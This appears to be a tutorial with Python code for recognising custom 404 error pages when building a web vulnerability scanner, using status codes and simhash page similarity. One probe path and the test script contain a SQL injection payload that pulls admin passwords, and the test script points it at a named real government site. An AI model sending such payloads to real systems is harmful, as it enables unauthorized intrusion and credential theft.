Some sites serve a custom, user-friendly error page instead of a bare 404. The 404 hint page on CSDN is one example.
This improves the user experience, but a POC that relies only on the returned HTTP header information is likely to produce false positives. To detect a 404 page accurately, you need to judge from two aspects: the status code and the page content.
Judging by the status code is the easier part: send the HTTP request with the requests library and read the response code.
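The status-code step can be sketched as a small three-way decision. This is only an illustration: the function name classify_status and its labels are hypothetical, and the list of ambiguous codes is assumed to be 200, 301 and 302, matching the _404_code list used later in this article.

```python
def classify_status(status_code, ambiguous_codes=(200, 301, 302)):
    """Return 'not_found', 'check_content', or 'other' for an HTTP status code."""
    if status_code == 404:
        # A real 404: no need to look at the page content.
        return "not_found"
    if status_code in ambiguous_codes:
        # The site may be serving a custom error page with a normal status.
        return "check_content"
    return "other"
```

With requests, the input would be requests.get(url).status_code. Note that requests.get follows redirects by default, so a 301 or 302 only shows up in status_code when the call passes allow_redirects=False.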
Judging by page content works as follows: request a page that obviously does not exist on the site and save its content, then request the target page and compare the two. If the similarity reaches a certain threshold, the target is a 404 page; otherwise it is a normal page.
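The comparison described above can be sketched without any third-party package. This is a minimal sketch under stated assumptions: it uses difflib.SequenceMatcher from the standard library as a stand-in similarity measure (not simhash), the names page_similarity, is_soft_404 and fake_fetch are hypothetical, and the HTTP client is passed in as a callable so the example runs offline.

```python
from difflib import SequenceMatcher


def page_similarity(page_a, page_b):
    """Return a ratio in [0, 1]; 1.0 means the two strings are identical."""
    return SequenceMatcher(None, page_a, page_b).ratio()


def is_soft_404(fetch, site, target_url,
                probe_path="no_such_page_404.html", threshold=0.85):
    """Compare target_url against a page that should not exist on site.

    fetch is any callable that maps a URL to the page body as a string.
    """
    probe_url = site.rstrip("/") + "/" + probe_path
    baseline = fetch(probe_url)  # body of a page that obviously does not exist
    target = fetch(target_url)   # body of the page under test
    return page_similarity(baseline, target) >= threshold


def fake_fetch(url):
    """Stand-in for a real HTTP client (assumption, for illustration only)."""
    if url.endswith("/index.html"):
        return "Welcome to the news portal. " * 20
    return ("Sorry, the page you requested could not be found on this server. "
            "Requested URL: " + url)
```

In real use, fetch could be something like lambda url: requests.get(url).text. The 0.85 threshold is the value used in this article, not a universal constant, and may need tuning per site.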
To measure the similarity of two pages I use a Python simhash library. I don't understand the specific algorithm this library implements, but that is the advantage of Python: you don't need to know, you can just use it. Here is a simple way to use it:
# -*- encoding: utf-8 -*-
# 404 page recognition
from hashes.simhash import simhash
import requests


class page_404:
    def __init__(self, domain):  # domain: the site to check
        self._404_page = []  # contents of known 404 pages
        self._404_url = []   # URLs already known to be 404
        # Paths used to generate some 404 pages
        self._404_path = [
            "Test_404.html",
            "404_test.html",
            "Helloworld.html",
            "test.asp?action=modify&newsid=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20fROM%20shopxp_admin",
        ]
        # Status codes whose pages may still be 404 pages.
        # The first value is garbled in the source; 200 is assumed.
        self._404_code = [200, 301, 302]
        # Build 404 URLs ourselves to collect some 404 page information
        for path in self._404_path:
            if domain[-1] == "/":
                url = domain + path
            else:
                url = domain + "/" + path
            response = requests.get(url)
            if response.status_code in self._404_code:
                self.kb_appent(response.content, url)

    def kb_appent(self, _404_page, _404_url):
        # Save the page content and URL if they are not already stored
        if _404_page not in self._404_page:
            self._404_page.append(_404_page)
        if _404_url not in self._404_url:
            self._404_url.append(_404_url)

    def is_similar_page(self, page1, page2):
        hash1 = simhash(page1)
        hash2 = simhash(page2)
        similar = hash1.similarity(hash2)
        return similar > 0.85  # the threshold is currently set to 0.85

    def is_404(self, url):
        if url in self._404_url:
            return True
        response = requests.get(url)
        if response.status_code == 404:
            return True
        if response.status_code in self._404_code:
            for page in self._404_page:
                if self.is_similar_page(response.content, page):
                    # It is a 404 page: save the page content and the URL
                    # (the source passed these two arguments in swapped order)
                    self.kb_appent(response.content, url)
                    return True
        return False
In the code above, the detection class mainly holds the following information:
_404_page: the contents of known 404 pages, compared against each requested page to decide whether it is a 404 page. It is a list because a site may have several different 404 pages. The longer this code runs, the more accurate the detection becomes.
_404_url: the URLs of pages already identified as 404. A URL that has been judged once is not judged again, which improves efficiency.
_404_path: paths used to build URLs of pages that do not exist. The last one is a SQL injection payload, included to capture the error page shown when a request is blocked by a firewall.
_404_code: response codes that may still come with a 404 page. If the response code is one of these, the page content has to be checked.
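The probe URLs built from _404_path can be spliced onto the domain as in the sketch below. The helper name build_probe_urls and the example host are hypothetical; the logic mirrors the trailing-slash check in the constructor, written with rstrip instead of indexing domain[-1].

```python
def build_probe_urls(domain, paths):
    """Join each path onto domain with exactly one slash in between."""
    base = domain.rstrip("/")
    return [base + "/" + path.lstrip("/") for path in paths]


probe_urls = build_probe_urls(
    "http://example.com/",
    ["test_404.html", "404_test.html"],
)
```

Plain string joining is used on purpose: urllib.parse.urljoin would replace the last path segment when the base has a path without a trailing slash, which is not what is wanted here.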
The class takes a domain name at initialization. From that domain it builds several requests for pages that do not exist or that a firewall will block, submits them, and saves the responses as the basis for later judgments.
The is_404 method first checks the previously saved 404 URLs; if the current URL is already known to be a 404, it returns immediately, which improves efficiency. It then submits a normal HTTP request and gets the response. It returns True if the response code is 404; otherwise, if the status code is in the _404_code list, it compares the page with the previously saved 404 pages.
The test code is as follows:
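# The module name is missing in the source; this assumes the class is saved as page_404.py
from page_404 import page_404

if __name__ == '__main__':
    domain = "http://xzylrd.gov.cn"
    check_404 = page_404(domain)
    dest_url = "http://xzylrd.gov.cn/TEXTBOX2.ASP?action=modify&newsid=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin"
    print(check_404.is_404(dest_url))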
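For readers curious about what the similarity check in is_similar_page is doing, here is a rough sketch of the general simhash idea. It is not the implementation of the library used above: the function names simhash_fingerprint and similarity, the word-level tokenization, the use of SHA-256 as the per-token hash and the 64-bit width are all assumptions made for illustration.

```python
import hashlib
import re


def simhash_fingerprint(text, bits=64):
    """Build a bits-wide fingerprint in which similar texts share most bits."""
    weights = [0] * bits
    for token in re.findall(r"\w+", text.lower()):
        digest = hashlib.sha256(token.encode("utf-8")).digest()
        token_hash = int.from_bytes(digest[:bits // 8], "big")
        # Each token votes +1 or -1 on every bit position.
        for i in range(bits):
            weights[i] += 1 if (token_hash >> i) & 1 else -1
    fingerprint = 0
    for i, weight in enumerate(weights):
        if weight > 0:
            fingerprint |= 1 << i
    return fingerprint


def similarity(hash_a, hash_b, bits=64):
    """Return 1.0 for identical fingerprints, lower as more bits differ."""
    hamming_distance = bin(hash_a ^ hash_b).count("1")
    return 1.0 - hamming_distance / bits


same = similarity(simhash_fingerprint("page not found"),
                  simhash_fingerprint("page not found"))
```

Because every token votes independently, word order does not affect the fingerprint, and changing a few words in a long page flips only a few bits. That is why two error pages that differ only in the echoed URL tend to score close to each other.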